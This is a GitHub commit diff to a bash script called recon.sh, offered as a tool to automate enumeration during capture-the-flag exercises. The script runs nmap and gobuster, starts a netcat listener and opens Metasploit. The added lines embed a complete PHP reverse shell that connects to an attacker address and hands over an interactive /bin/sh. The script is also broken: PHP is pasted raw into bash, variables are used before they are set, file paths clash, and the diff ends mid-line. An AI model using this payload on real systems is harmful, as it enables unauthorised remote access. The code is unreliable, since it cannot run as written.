Skip to content

Commit

Permalink
Update recon.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
@palanioffcl
palanioffcl authored Jan 25, 2022
1 parent dc8932d commit 8ad7350
Showing 1 changed file with 130 additions and 47 deletions.
177 changes: 130 additions & 47 deletions recon.sh
View file
Original file line number Diff line number Diff line change
@@ -1,90 +1,173 @@
#!/bin/bash

#clear screen
red=`tput setaf 1`
blue=`tput setaf 4`
reset=`tput sgr0`

#clear screen
clear

#banner

echo " ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗::
::██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║::
::██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║███████║ ██║ ██║██║ ██║██╔██╗ ██║::
::██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║██╔══██║ ██║ ██║██║ ██║██║╚██╗██║::
::██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║::
::╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Made by Palani::::::::::::::::"
#banner
echo "${red}
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ██████╗████████╗███████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ ::
:: ██╔════╝╚══██╔══╝██╔════╝██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ ::
:: ██║ ██║ █████╗ ███████║ ██║ ██║██║ ██║██╔██╗ ██║ ::
:: ██║ ██║ ██╔══╝ ██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ ::
:: ╚██████╗ ██║ ██║ ██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ::
:: ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ::
${blue}:::::::::::::::::::::::${reset}Made by Palani${blue}:::::::::::::::::::::::::::::::::
:: CTF + Automation ::
:: A Tool to Automate Enumeration and stuffs during CTFs. ::
:: Github : ${reset}github.com/palanioffcl${blue} ::
:: Twitter : ${reset}twitter.com/palanioffcl${blue} ::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::${reset}"

#getting domain or ip address for recon

echo "Enter your IP or domain :"

read ip

#Checking whether its is a Valid domain or ip

count=$( ping -c 1 $ip | grep icmp* | wc -l )

if [ $count -eq 0 ]

then

echo "Host is Down. Cross check the IP or domain "

else

echo "Its up :)"

fi

# Nmap scan

echo nmap scan is started....
#Creating Required directories
mkdir ./$ip@$ondate
mkdir ./$ip@$ondate/reports/

nmap -sC -sV -oA "$ip" -p -o nmap_"$ip".txt
touch ./$ip@$ondate/reports/nmap.txt
touch ./$ip@$ondate/reports/gobuster.txt
touch ./$ip@$ondate/reports/nmap.txt
touch ./$ip@$ondate/report.html

# Nmap scan
echo nmap scan is started....
nmap -sC -sV -oA "$ip" -p -o nmap_"$ip".txt > ./$ip_on_$ondate/reports/nmap.txt
xdotool key alt+shift+right

xdotool key alt+right

# Gouster bruteforcing directories

echo gobuster is runnning....

gobuster dir -u http://"$ip"/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

gobuster dir -u http://"$ip"/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt > ./$ip_on_$ondate/reports/gobuster.txt
xdotool key alt+shift+down

xdotool key alt+down

# netcat to get the reverse shell

echo Started netcat to get shell

nc -nvlp "$ip" 1234

xdotool key alt+shift+left

xdotool key alt+left

# starting metasploit

echo opening Metasploit...

msfconsole

# opening web browser to view the website

firefox http://"$ip"

#opening required directories

mkdir ./$ip

#date when the scan was done
ondate=$(date +"%Y-%m-%d")


#Generating php reverse shell
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = "'''+ $tun_ip + '''\";
$port = 1234;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
#generate report
echo "

0 comments on commit 8ad7350

Please sign in to comment.